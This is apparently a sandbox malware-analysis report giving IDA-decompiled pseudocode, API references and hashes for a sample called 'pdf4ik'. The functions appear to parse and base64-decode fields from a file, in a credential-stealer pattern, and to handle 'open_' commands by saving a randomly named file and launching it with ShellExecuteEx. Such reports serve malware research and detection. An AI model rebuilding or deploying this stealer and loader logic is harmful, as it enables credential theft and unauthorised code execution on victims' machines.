                                        					_t130 =  &_v3012;
                                        					_v9016 = _t185;
                                        					 *_t152 = 0;
                                        					_t171 = _t125 + 1;
                                        					do {
                                        						_t168 =  *_t125;
                                        						_t125 = _t125 + 1;
                                        					} while (_t168 != 0);
                                        					E29D892C0(_t152,  &_v4012, _t125 - _t171);
                                        					E29D8F3E0( &_v3012);
                                        					_t182 = _t185 + 0x1c;
                                        				}
                                        				_t120 = GetFileAttributesA( &_v2012);
                                        				if(_t120 != 0xffffffff && (_t120 & 0x00000010) == 0) {
                                        					_t183 = _t182 - 0x1c;
                                        					_t151 = _t183;
                                        					_t122 =  &_v4012;
                                        					 *((intOrPtr*)(_t151 + 0x14)) = 0xf;
                                        					 *((intOrPtr*)(_t151 + 0x10)) = 0;
                                        					_t130 =  &_v5012;
                                        					_v9016 = _t183;
                                        					 *_t151 = 0;
                                        					_t171 = _t122 + 1;
                                        					do {
                                        						_t169 =  *_t122;
                                        						_t122 = _t122 + 1;
                                        					} while (_t169 != 0);
                                        					_t168 =  &_v4012;
                                        					E29D892C0(_t151,  &_v4012, _t122 - _t171);
                                        					_t120 = E29D8F3E0( &_v5012);
                                        				}
                                        				return E29DADF46(_t120, _t130, _v8 ^ _t172, _t168, _t170, _t171);
                                        			}

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$_memset$AttributesFile
                                        • String ID:
                                        • API String ID: 1561027885-0
                                        • Opcode ID: 9c913ce21dc83106526fc79daef690ccbd6cf28ce4848170c5f284e7a12b4ebc
                                        • Instruction ID: 8ddca2dfa445ecb5fa582cf7aef29bb60dd86b0cfa1d20fd5147e07d4077d288
                                        • Opcode Fuzzy Hash: 9c913ce21dc83106526fc79daef690ccbd6cf28ce4848170c5f284e7a12b4ebc
                                        • Instruction Fuzzy Hash: 609173B6C40259ABC715EF60DC88FEE7778FB18700F44859CF109A6481EB7897499FA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 89%
                                        			E29D9AA10(CHAR* __ecx, CHAR* __esi, CHAR* _a4) {
                                        				signed int _v8;
                                        				char _v268;
                                        				void* _v272;
                                        				CHAR* _v276;
                                        				char* _v280;
                                        				long _v284;
                                        				void* __ebx;
                                        				void* __edi;
                                        				signed int _t26;
                                        				void* _t41;
                                        				char* _t43;
                                        				char* _t47;
                                        				CHAR* _t53;
                                        				char* _t57;
                                        				char* _t59;
                                        				char* _t60;
                                        				char* _t65;
                                        				CHAR* _t66;
                                        				int _t67;
                                        				char* _t68;
                                        				char* _t73;
                                        				void* _t75;
                                        				void* _t76;
                                        				CHAR* _t77;
                                        				CHAR* _t84;
                                        				CHAR* _t87;
                                        				char* _t88;
                                        				CHAR* _t89;
                                        				char* _t91;
                                        				CHAR* _t95;
                                        				CHAR* _t97;
                                        				char* _t98;
                                        				CHAR* _t99;
                                        				long _t100;
                                        				char* _t101;
                                        				char* _t104;
                                        				char* _t107;
                                        				CHAR* _t109;
                                        				signed int _t110;
                                        
                                        				_t109 = __esi;
                                        				_t26 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t26 ^ _t110;
                                        				_push(0x29dd8300);
                                        				_v276 = _a4;
                                        				_t99 = __ecx;
                                        				if(E29DAEC33() < 0x20) {
                                        					_push(_t75);
                                        					E29DB5640( &_v268, 0, 0x104);
                                        					lstrcatA( &_v268, _t99);
                                        					lstrcatA( &_v268, "\\");
                                        					_t84 =  *0x29dd82d0; // 0x15a1e00
                                        					_t93 =  &_v268;
                                        					lstrcatA( &_v268, _t84);
                                        					_t76 = CreateFileA( &_v268, 0x80000000, 1, 0, 3, 0, 0);
                                        					_v272 = _t76;
                                        					_t116 = _t76;
                                        					if(_t76 != 0) {
                                        						SetFilePointer(_t76, 0, 0, 2);
                                        						_t100 = GetFileSize(_t76, 0);
                                        						SetFilePointer(_t76, 0, 0, 0);
                                        						_t10 = _t100 + 1; // 0x1
                                        						_t41 = E29DAD4FB(_t76,  &_v268, _t100, __esi, _t116, _t10);
                                        						_t93 =  &_v284;
                                        						_v280 = _t41;
                                        						ReadFile(_t76, _t41, _t100,  &_v284, 0);
                                        						_t43 =  *0x29dd7bb4; // 0x15a1e30
                                        						_t99 = StrStrA(_v280, _t43);
                                        						if(_t99 != 0) {
                                        							do {
                                        								_t95 =  *0x29dd7bb4; // 0x15a1e30
                                        								_t15 = lstrlenA(_t95) + 3; // 0x3
                                        								_t77 =  &(_t99[_t15]);
                                        								_t47 =  *0x29dd7e28; // 0x15a1f80
                                        								_t101 = StrStrA(_t77, _t47);
                                        								 *((char*)(_t101 - 3)) = 0;
                                        								lstrcatA(__esi, "\n");
                                        								_t87 =  *0x29dd7ed8; // 0x15a1a00
                                        								lstrcatA(__esi, _t87);
                                        								lstrcatA(__esi, _v276);
                                        								lstrcatA(__esi, "\n");
                                        								_t53 =  *0x29dd81e0; // 0x15a1a10
                                        								lstrcatA(__esi, _t53);
                                        								lstrcatA(__esi, _t77);
                                        								lstrcatA(__esi, "\n");
                                        								_t88 =  *0x29dd8074; // 0x159cd50
                                        								_t57 = StrStrA(_t101 + 0xfffffffe, _t88);
                                        								_t97 =  *0x29dd8074; // 0x159cd50
                                        								_t19 = lstrlenA(_t97) + 3; // 0x3
                                        								_t59 =  *0x29dd8070; // 0x159cd30
                                        								_t60 = StrStrA( &(_t57[_t19]), _t59);
                                        								_t89 =  *0x29dd7c9c; // 0x15a1a20
                                        								_t104 = _t60;
                                        								 *((char*)(_t104 - 3)) = 0;
                                        								lstrcatA(__esi, _t89);
                                        								lstrcatA(__esi, E29D98FB0( &(_t57[_t19])));
                                        								lstrcatA(__esi, "\n");
                                        								_t98 =  *0x29dd8070; // 0x159cd30
                                        								_t65 = StrStrA( &(_t104[0xfffffffffffffffe]), _t98);
                                        								_t66 =  *0x29dd8070; // 0x159cd30
                                        								_t67 = lstrlenA(_t66);
                                        								_t91 =  *0x29dd81f4; // 0x15a1c50
                                        								_t22 = _t67 + 3; // 0x3
                                        								_t68 = StrStrA( &(_t65[_t22]), _t91);
                                        								_t93 =  *0x29dd819c; // 0x15a4b68
                                        								_t107 = _t68;
                                        								 *((char*)(_t107 - 3)) = 0;
                                        								lstrcatA(__esi, _t93);
                                        								lstrcatA(__esi, E29D98FB0( &(_t65[_t22])));
                                        								lstrcatA(__esi, "\n\n");
                                        								_t73 =  *0x29dd7bb4; // 0x15a1e30
                                        								_t99 = StrStrA( &(_t107[0xfffffffffffffffe]), _t73);
                                        							} while (_t99 != 0);
                                        							_t76 = _v272;
                                        						}
                                        						CloseHandle(_t76);
                                        					}
                                        					_t29 =  *0x29dd834c();
                                        					_pop(_t75);
                                        				}
                                        				return E29DADF46(_t29, _t75, _v8 ^ _t110, _t93, _t99, _t109);
                                        			}

                                        APIs
                                        • _memset.LIBCMT ref: 29D9AA54
                                        • lstrcatA.KERNEL32(?,?,?,?,29DCD617,?), ref: 29D9AA64
                                        • lstrcatA.KERNEL32(?,29DCD7BC,?,?,29DCD617,?), ref: 29D9AA76
                                        • lstrcatA.KERNEL32(?,015A1E00,?,?,29DCD617,?), ref: 29D9AA8A
                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,29DCD617,?), ref: 29D9AAA6
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,29DCD617,?), ref: 29D9AAC3
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,29DCD617,?), ref: 29D9AACC
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,29DCD617,?), ref: 29D9AADB
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,29DCD617,?), ref: 29D9AAFF
                                        • StrStrA.SHLWAPI(?,015A1E30,?,?,?,29DCD617,?), ref: 29D9AB12
                                        • lstrlenA.KERNEL32(015A1E30,?,?,?,29DCD617,?), ref: 29D9AB29
                                        • StrStrA.SHLWAPI(00000003,015A1F80,?,?,?,29DCD617,?), ref: 29D9AB3A
                                        • lstrcatA.KERNEL32(?,29DCD628,?,?,?,29DCD617,?), ref: 29D9AB4C
                                        • lstrcatA.KERNEL32(?,015A1A00,?,?,?,29DCD617,?), ref: 29D9AB5A
                                        • lstrcatA.KERNEL32(?,?,?,?,?,29DCD617,?), ref: 29D9AB68
                                        • lstrcatA.KERNEL32(?,29DCD628,?,?,?,29DCD617,?), ref: 29D9AB74
                                        • lstrcatA.KERNEL32(?,015A1A10,?,?,?,29DCD617,?), ref: 29D9AB81
                                        • lstrcatA.KERNEL32(?,00000003,?,?,?,29DCD617,?), ref: 29D9AB89
                                        • lstrcatA.KERNEL32(?,29DCD628,?,?,?,29DCD617,?), ref: 29D9AB95
                                        • StrStrA.SHLWAPI(-000000FE,0159CD50,?,?,?,29DCD617,?), ref: 29D9ABA6
                                        • lstrlenA.KERNEL32(0159CD50,?,?,?,29DCD617,?), ref: 29D9ABB5
                                        • StrStrA.SHLWAPI(00000003,0159CD30,?,?,?,29DCD617,?), ref: 29D9ABC6
                                        • lstrcatA.KERNEL32(?,015A1A20,?,?,?,29DCD617,?), ref: 29D9ABDA
                                          • Part of subcall function 29D98FB0: _memset.LIBCMT ref: 29D98FE8
                                          • Part of subcall function 29D98FB0: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,29D9ABE7,?,?,?,29DCD617,?), ref: 29D99005
                                          • Part of subcall function 29D98FB0: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 29D9900D
                                          • Part of subcall function 29D98FB0: _memmove.LIBCMT ref: 29D99098
                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,29DCD617,?), ref: 29D9ABE9
                                        • lstrcatA.KERNEL32(?,29DCD628,?,?,?,29DCD617,?), ref: 29D9ABF5
                                        • StrStrA.SHLWAPI(-000000FE,0159CD30,?,?,?,29DCD617,?), ref: 29D9AC06
                                        • lstrlenA.KERNEL32(0159CD30,?,?,?,29DCD617,?), ref: 29D9AC14
                                        • StrStrA.SHLWAPI(00000003,015A1C50,?,?,?,29DCD617,?), ref: 29D9AC26
                                        • lstrcatA.KERNEL32(?,015A4B68,?,?,?,29DCD617,?), ref: 29D9AC3A
                                          • Part of subcall function 29D98FB0: lstrcatA.KERNEL32(29DCD617,29DCD617,?,00000000,00000000,?,?,29D9ABE7,?,?,?,29DCD617,?), ref: 29D990D5
                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,29DCD617,?), ref: 29D9AC49
                                        • lstrcatA.KERNEL32(?,29DCFC38,?,?,?,29DCD617,?), ref: 29D9AC55
                                        • StrStrA.SHLWAPI(-000000FE,015A1E30,?,?,?,29DCD617,?), ref: 29D9AC65
                                        • CloseHandle.KERNEL32(00000000,?,?,?,29DCD617,?), ref: 29D9AC7C
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$File$lstrlen$Pointer_memset$BinaryCloseCreateCryptHandleReadSizeString_memmove
                                        • String ID:
                                        • API String ID: 1742400647-0
                                        • Opcode ID: 4d27a1e07593b5ddd3e754c20b3df7856cd19839b214721b827863a44a71ff02
                                        • Instruction ID: ddf9203df58b61508b8dbeffd3658e4a4d016f776cde4949c0036aeda2d37d23
                                        • Opcode Fuzzy Hash: 4d27a1e07593b5ddd3e754c20b3df7856cd19839b214721b827863a44a71ff02
                                        • Instruction Fuzzy Hash: 01614F77581244AFD312BBA4EC88FAA7779BF59B01F148248F606D3240DF789946EB70
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 60%
                                        			E29D8EA30(char _a4, intOrPtr _a24) {
                                        				char _v8;
                                        				char _v16;
                                        				signed int _v24;
                                        				char _v1019;
                                        				char _v1020;
                                        				char _v1021;
                                        				char _v1022;
                                        				char _v1023;
                                        				char _v1024;
                                        				char _v2024;
                                        				char _v3024;
                                        				char _v3028;
                                        				char _v3032;
                                        				intOrPtr _v3036;
                                        				char _v3064;
                                        				intOrPtr _v3068;
                                        				char _v3072;
                                        				intOrPtr _v3076;
                                        				CHAR* _v3080;
                                        				char* _v3084;
                                        				char _v3088;
                                        				char _v3092;
                                        				char _v3096;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t62;
                                        				signed int _t63;
                                        				char* _t67;
                                        				char _t77;
                                        				CHAR* _t78;
                                        				signed int _t83;
                                        				CHAR* _t87;
                                        				void* _t100;
                                        				void* _t101;
                                        				char _t102;
                                        				char* _t119;
                                        				void* _t130;
                                        				CHAR* _t131;
                                        				void* _t132;
                                        				void* _t134;
                                        				CHAR* _t135;
                                        				signed int _t136;
                                        				void* _t137;
                                        				void* _t139;
                                        				void* _t140;
                                        				void* _t143;
                                        				void* _t145;
                                        				void* _t147;
                                        				char* _t151;
                                        
                                        				_push(0xffffffff);
                                        				_push(E29DC1F48);
                                        				_push( *[fs:0x0]);
                                        				_t62 =  *0x29dd5664; // 0xd9555f04
                                        				_t63 = _t62 ^ _t136;
                                        				_v24 = _t63;
                                        				_push(_t100);
                                        				_push(0);
                                        				_push(_t130);
                                        				_push(_t63);
                                        				 *[fs:0x0] =  &_v16;
                                        				_v8 = 0;
                                        				 *0x29dd86ec = 1;
                                        				E29DB5640( &_v2024, 0, 0x3e8);
                                        				_t67 = _a4;
                                        				_t139 = _t137 - 0xc08 + 0xc;
                                        				_v3028 = 0x3b;
                                        				if(_a24 < 0x10) {
                                        					_t67 =  &_a4;
                                        				}
                                        				_t121 =  &_v3032;
                                        				_t131 = E29DAEA8E(_t100,  &_v3032, _t130, _t67,  &_v3028,  &_v3032);
                                        				_t140 = _t139 + 0xc;
                                        				while(_t131 != 0) {
                                        					if(lstrlenA(_t131) > 5) {
                                        						E29DB5640( &_v1024, 0, 0x3e8);
                                        						E29DB5640( &_v3024, 0, 0x3e8);
                                        						_t143 = _t140 + 0x18;
                                        						if(lstrlenA(_t131) >= 0) {
                                        							_v1024 =  *_t131 & 0x000000ff;
                                        							_v1023 = _t131[1] & 0x000000ff;
                                        							_v1022 = _t131[2];
                                        							_v1021 = _t131[3] & 0x000000ff;
                                        							_v1020 = _t131[4] & 0x000000ff;
                                        							_v1019 = 0;
                                        						} else {
                                        							_v1024 = 0;
                                        						}
                                        						_t24 =  &(_t131[5]); // 0x5
                                        						 *0x29dd85cc( &_v3024, _t24);
                                        						_t77 =  *0x29dd8550( &_v1024, "open_");
                                        						if(_t77 != 0) {
                                        							_t78 =  *0x29dd8098; // 0x15a1f98
                                        							lstrcatA( &_v2024, _t78);
                                        							_t135 = E29DADFE0( &_v1024, _t131, 0, 0x14);
                                        							 *_t135 = 0;
                                        							E29DAFCE4(GetTickCount());
                                        							_t145 = _t143 + 8;
                                        							_t102 = 0x14;
                                        							do {
                                        								_t83 = E29DAFCF6(__eflags);
                                        								asm("cdq");
                                        								_push(_t83 % 0xa);
                                        								_push(_t135);
                                        								wsprintfA(_t135, "%s%d");
                                        								_t145 = _t145 + 0x10;
                                        								_t102 = _t102 - 1;
                                        								__eflags = _t102;
                                        							} while (__eflags != 0);
                                        							_t135[0x14] = _t102;
                                        							lstrcatA( &_v2024, _t135);
                                        							_t87 =  *0x29dd7ecc; // 0x15a1ad0
                                        							lstrcatA( &_v2024, _t87);
                                        							E29D97E40(_t131,  &_v2024);
                                        							__eflags = 0;
                                        							E29DB5640( &_v3096, 0, 0x3c);
                                        							_t147 = _t145 + 0x10;
                                        							_v3096 = 0x3c;
                                        							_v3092 = 0;
                                        							_v3088 = 0;
                                        							_v3084 = "open";
                                        							_v3080 =  &_v2024;
                                        							_v3076 = 0x29dcd617;
                                        							_v3072 = 0;
                                        							_v3068 = 5;
                                        							_v3064 = 0;
                                        							 *0x29dd8584( &_v3096);
                                        						} else {
                                        							_t151 = _t143 - 0x1c;
                                        							_t119 = _t151;
                                        							_v3036 = _t151;
                                        							 *((intOrPtr*)(_t119 + 0x14)) = 0xf;
                                        							 *((intOrPtr*)(_t119 + 0x10)) = _t77;
                                        							 *_t119 = _t77;
                                        							E29D892C0(_t119, 0x29dcd617, _t77);
                                        							E29D986A0( &_v3024);
                                        							_t147 = _t151 + 0x1c;
                                        						}
                                        						E29DB5640( &_v2024, 0, 0x3e8);
                                        						E29DB5640( &_v1024, 0, 0x3e8);
                                        						_t121 =  &_v3024;
                                        						E29DB5640( &_v3024, 0, 0x3e8);
                                        						_t68 = E29DAEA8E(_t102,  &_v3024, _t131, 0,  &_v3028,  &_v3032);
                                        						_t140 = _t147 + 0x30;
                                        						_t131 = _t68;
                                        					}
                                        				}
                                        				 *0x29dd86f4 = 1;
                                        				if(_a24 >= 0x10) {
                                        					_t121 = _a4;
                                        					_push(_a4);
                                        					_t68 = E29DADF3B();
                                        				}
                                        				 *[fs:0x0] = _v16;
                                        				_pop(_t132);
                                        				_pop(_t134);
                                        				_pop(_t101);
                                        				return E29DADF46(_t68, _t101, _v24 ^ _t136, _t121, _t132, _t134);
                                        			}

                                        APIs
                                        • _memset.LIBCMT ref: 29D8EA7D
                                        • _strtok_s.LIBCMT ref: 29D8EAAC
                                        • lstrlenA.KERNEL32(00000000), ref: 29D8EAC1
                                        • _memset.LIBCMT ref: 29D8EADE
                                        • _memset.LIBCMT ref: 29D8EAF4
                                        • lstrlenA.KERNEL32(00000000), ref: 29D8EAFD
                                        • lstrcpy.KERNEL32(?,00000005), ref: 29D8EB52
                                        • StrCmpCA.SHLWAPI(?,open_), ref: 29D8EB64
                                        • lstrcatA.KERNEL32(?,015A1F98), ref: 29D8EBB0
                                        • _malloc.LIBCMT ref: 29D8EBB8
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • GetTickCount.KERNEL32 ref: 29D8EBC5
                                          • Part of subcall function 29DAFCE4: __getptd.LIBCMT ref: 29DAFCE9
                                        • _rand.LIBCMT ref: 29D8EBE0
                                          • Part of subcall function 29DAFCF6: __getptd.LIBCMT ref: 29DAFCF6
                                        • wsprintfA.USER32 ref: 29D8EBF5
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D8EC0C
                                        • lstrcatA.KERNEL32(?,015A1AD0), ref: 29D8EC1F
                                        • _memset.LIBCMT ref: 29D8EC42
                                        • ShellExecuteEx.SHELL32(?), ref: 29D8EC9D
                                        • _memset.LIBCMT ref: 29D8ECB1
                                        • _memset.LIBCMT ref: 29D8ECC7
                                        • _memset.LIBCMT ref: 29D8ECDD
                                        • _strtok_s.LIBCMT ref: 29D8ECF5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _memset$lstrcat$__getptd_strtok_slstrlen$AllocateCountExecuteHeapShellTick_malloc_randlstrcpywsprintf
                                        • String ID: %s%d$<$open$open_
                                        • API String ID: 3498441035-2932150108
                                        • Opcode ID: 6f54ab2b3eae802cf809044ab4fb82a9e32efabfb86d7b6d4d34dc3f59e4f3c2
                                        • Instruction ID: 4247f4e5eff6c7d5e449ab18abb187c187b627ce2093d3b77c360424a48eb426
                                        • Opcode Fuzzy Hash: 6f54ab2b3eae802cf809044ab4fb82a9e32efabfb86d7b6d4d34dc3f59e4f3c2
                                        • Instruction Fuzzy Hash: 6B81C3B2C40299ABD712EF20DC44F9ABB78EB14704F0085DDE509A7681EB785B45DFB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 62%
                                        			E29DB5394(void* __ebx) {
                                        				void* __edi;
                                        				void* __esi;
                                        				_Unknown_base(*)()* _t7;
                                        				long _t10;
                                        				void* _t11;
                                        				int _t12;
                                        				void* _t14;
                                        				void* _t15;
                                        				void* _t16;
                                        				void* _t18;
                                        				intOrPtr _t21;
                                        				long _t26;
                                        				void* _t30;
                                        				struct HINSTANCE__* _t35;
                                        				intOrPtr* _t36;
                                        				void* _t39;
                                        				intOrPtr* _t41;
                                        				void* _t42;
                                        
                                        				_t30 = __ebx;
                                        				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
                                        				if(_t35 != 0) {
                                        					 *0x29dd76b8 = GetProcAddress(_t35, "FlsAlloc");
                                        					 *0x29dd76bc = GetProcAddress(_t35, "FlsGetValue");
                                        					 *0x29dd76c0 = GetProcAddress(_t35, "FlsSetValue");
                                        					_t7 = GetProcAddress(_t35, "FlsFree");
                                        					__eflags =  *0x29dd76b8;
                                        					_t39 = TlsSetValue;
                                        					 *0x29dd76c4 = _t7;
                                        					if( *0x29dd76b8 == 0) {
                                        						L6:
                                        						 *0x29dd76bc = TlsGetValue;
                                        						 *0x29dd76b8 = E29DB50A4;
                                        						 *0x29dd76c0 = _t39;
                                        						 *0x29dd76c4 = TlsFree;
                                        					} else {
                                        						__eflags =  *0x29dd76bc;
                                        						if( *0x29dd76bc == 0) {
                                        							goto L6;
                                        						} else {
                                        							__eflags =  *0x29dd76c0;
                                        							if( *0x29dd76c0 == 0) {
                                        								goto L6;
                                        							} else {
                                        								__eflags = _t7;
                                        								if(_t7 == 0) {
                                        									goto L6;
                                        								}
                                        							}
                                        						}
                                        					}
                                        					_t10 = TlsAlloc();
                                        					 *0x29dd5df0 = _t10;
                                        					__eflags = _t10 - 0xffffffff;
                                        					if(_t10 == 0xffffffff) {
                                        						L15:
                                        						_t11 = 0;
                                        						__eflags = 0;
                                        					} else {
                                        						_t12 = TlsSetValue(_t10,  *0x29dd76bc);
                                        						__eflags = _t12;
                                        						if(_t12 == 0) {
                                        							goto L15;
                                        						} else {
                                        							E29DB311B();
                                        							_t41 = __imp__EncodePointer;
                                        							_t14 =  *_t41( *0x29dd76b8);
                                        							 *0x29dd76b8 = _t14;
                                        							_t15 =  *_t41( *0x29dd76bc);
                                        							 *0x29dd76bc = _t15;
                                        							_t16 =  *_t41( *0x29dd76c0);
                                        							 *0x29dd76c0 = _t16;
                                        							 *0x29dd76c4 =  *_t41( *0x29dd76c4);
                                        							_t18 = E29DB5F46();
                                        							__eflags = _t18;
                                        							if(_t18 == 0) {
                                        								L14:
                                        								E29DB50E1();
                                        								goto L15;
                                        							} else {
                                        								_t36 = __imp__DecodePointer;
                                        								_t21 =  *((intOrPtr*)( *_t36()))( *0x29dd76b8, E29DB5265);
                                        								 *0x29dd5dec = _t21;
                                        								__eflags = _t21 - 0xffffffff;
                                        								if(_t21 == 0xffffffff) {
                                        									goto L14;
                                        								} else {
                                        									_t42 = E29DB1F54(1, 0x214);
                                        									__eflags = _t42;
                                        									if(_t42 == 0) {
                                        										goto L14;
                                        									} else {
                                        										__eflags =  *((intOrPtr*)( *_t36()))( *0x29dd76c0,  *0x29dd5dec, _t42);
                                        										if(__eflags == 0) {
                                        											goto L14;
                                        										} else {
                                        											_push(0);
                                        											_push(_t42);
                                        											E29DB511E(_t30, _t36, _t42, __eflags);
                                        											_t26 = GetCurrentThreadId();
                                        											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                        											 *_t42 = _t26;
                                        											_t11 = 1;
                                        										}
                                        									}
                                        								}
                                        							}
                                        						}
                                        					}
                                        					return _t11;
                                        				} else {
                                        					E29DB50E1();
                                        					return 0;
                                        				}
                                        			}

                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,29DAFE19), ref: 29DB539C
                                        • __mtterm.LIBCMT ref: 29DB53A8
                                          • Part of subcall function 29DB50E1: DecodePointer.KERNEL32(00000005,29DB550A,?,29DAFE19), ref: 29DB50F2
                                          • Part of subcall function 29DB50E1: TlsFree.KERNEL32(00000005,29DB550A,?,29DAFE19), ref: 29DB510C
                                          • Part of subcall function 29DB50E1: DeleteCriticalSection.KERNEL32(00000000,00000000,76ED5C50,?,29DB550A,?,29DAFE19), ref: 29DB5FAD
                                          • Part of subcall function 29DB50E1: _free.LIBCMT ref: 29DB5FB0
                                          • Part of subcall function 29DB50E1: DeleteCriticalSection.KERNEL32(00000005,76ED5C50,?,29DB550A,?,29DAFE19), ref: 29DB5FD7
                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 29DB53BE
                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 29DB53CB
                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 29DB53D8
                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 29DB53E5
                                        • TlsAlloc.KERNEL32(?,29DAFE19), ref: 29DB5435
                                        • TlsSetValue.KERNEL32(00000000,?,29DAFE19), ref: 29DB5450
                                        • __init_pointers.LIBCMT ref: 29DB545A
                                        • EncodePointer.KERNEL32(?,29DAFE19), ref: 29DB546B
                                        • EncodePointer.KERNEL32(?,29DAFE19), ref: 29DB5478
                                        • EncodePointer.KERNEL32(?,29DAFE19), ref: 29DB5485
                                        • EncodePointer.KERNEL32(?,29DAFE19), ref: 29DB5492
                                        • DecodePointer.KERNEL32(29DB5265,?,29DAFE19), ref: 29DB54B3
                                        • __calloc_crt.LIBCMT ref: 29DB54C8
                                        • DecodePointer.KERNEL32(00000000,?,29DAFE19), ref: 29DB54E2
                                        • GetCurrentThreadId.KERNEL32 ref: 29DB54F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                        • API String ID: 3698121176-3819984048
                                        • Opcode ID: a5152f13ab700f6a691953a65bae89d936046ed1085f5f6ec426bad190f17548
                                        • Instruction ID: 8287897b55cedbde145a44ac01ddbd08efb036001e9cb8f67b5b2e3cba7f2cfa
                                        • Opcode Fuzzy Hash: a5152f13ab700f6a691953a65bae89d936046ed1085f5f6ec426bad190f17548
                                        • Instruction Fuzzy Hash: A13183B68042919BC741BF79EC1850A3FA5FB562A1750C6AEE411C7694FB389002FFB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 61%
                                        			E29D928B0(void* __ecx, void* __eflags, void* _a4, CHAR* _a12, signed int _a16, char _a56, intOrPtr _a72, char _a76, char _a84, intOrPtr _a92, intOrPtr _a100, char _a104, char _a112, char _a1104, char _a1112, char _a2104, char _a2112, char _a3100, char _a3112, signed int _a8116, char _a8124, long _a8132) {
                                        				CHAR* _v0;
                                        				char _v4;
                                        				intOrPtr _v8;
                                        				intOrPtr _v16;
                                        				long _v20;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t67;
                                        				signed int _t69;
                                        				intOrPtr* _t72;
                                        				signed int _t80;
                                        				CHAR* _t82;
                                        				char* _t83;
                                        				intOrPtr* _t92;
                                        				CHAR* _t97;
                                        				int _t105;
                                        				int _t107;
                                        				CHAR* _t118;
                                        				void* _t123;
                                        				intOrPtr _t130;
                                        				char* _t132;
                                        				char* _t139;
                                        				long _t144;
                                        				intOrPtr _t152;
                                        				void* _t154;
                                        				void* _t157;
                                        				void* _t158;
                                        				void* _t162;
                                        				void* _t163;
                                        				signed int _t164;
                                        				signed int _t165;
                                        				void* _t172;
                                        				char* _t174;
                                        				void* _t175;
                                        				signed int _t179;
                                        				char* _t180;
                                        				void* _t181;
                                        				void* _t182;
                                        				void* _t184;
                                        
                                        				_t181 = __eflags;
                                        				_t165 = _t164 & 0xfffffff8;
                                        				_push(0xffffffff);
                                        				_push(E29DC2676);
                                        				_push( *[fs:0x0]);
                                        				_push(__ecx);
                                        				E29DBCDB0(0x1fcc);
                                        				_t67 =  *0x29dd5664; // 0xd9555f04
                                        				_a8116 = _t67 ^ _t165;
                                        				_push(_t158);
                                        				_push(_t154);
                                        				_t69 =  *0x29dd5664; // 0xd9555f04
                                        				_push(_t69 ^ _t165);
                                        				 *[fs:0x0] =  &_a8124;
                                        				_t72 = _a4;
                                        				_t121 =  *_t72;
                                        				_v8 =  *((intOrPtr*)(_t72 + 4));
                                        				E29DB5640( &_v4, 0, 0x3c);
                                        				E29DB5640( &_a3112, 0, 0x1388);
                                        				E29DB5640( &_a2112, 0, 0x3e8);
                                        				E29DB5640( &_a1112, 0, 0x3e8);
                                        				_t80 = E29DB5640( &_a112, 0, 0x3e8) | 0xffffffff;
                                        				_v4 = 0x3c;
                                        				_a4 = _t80;
                                        				_a16 = _t80;
                                        				_a12 = E29DAD4FB( *_t72,  &_a112, _t154, _t158, _t181, 0x400);
                                        				_t82 = E29DAD4FB( *_t72,  &_a112, _t154, _t158, _t181, 0x400);
                                        				_t172 = _t165 + 0x44;
                                        				_v0 = _t82;
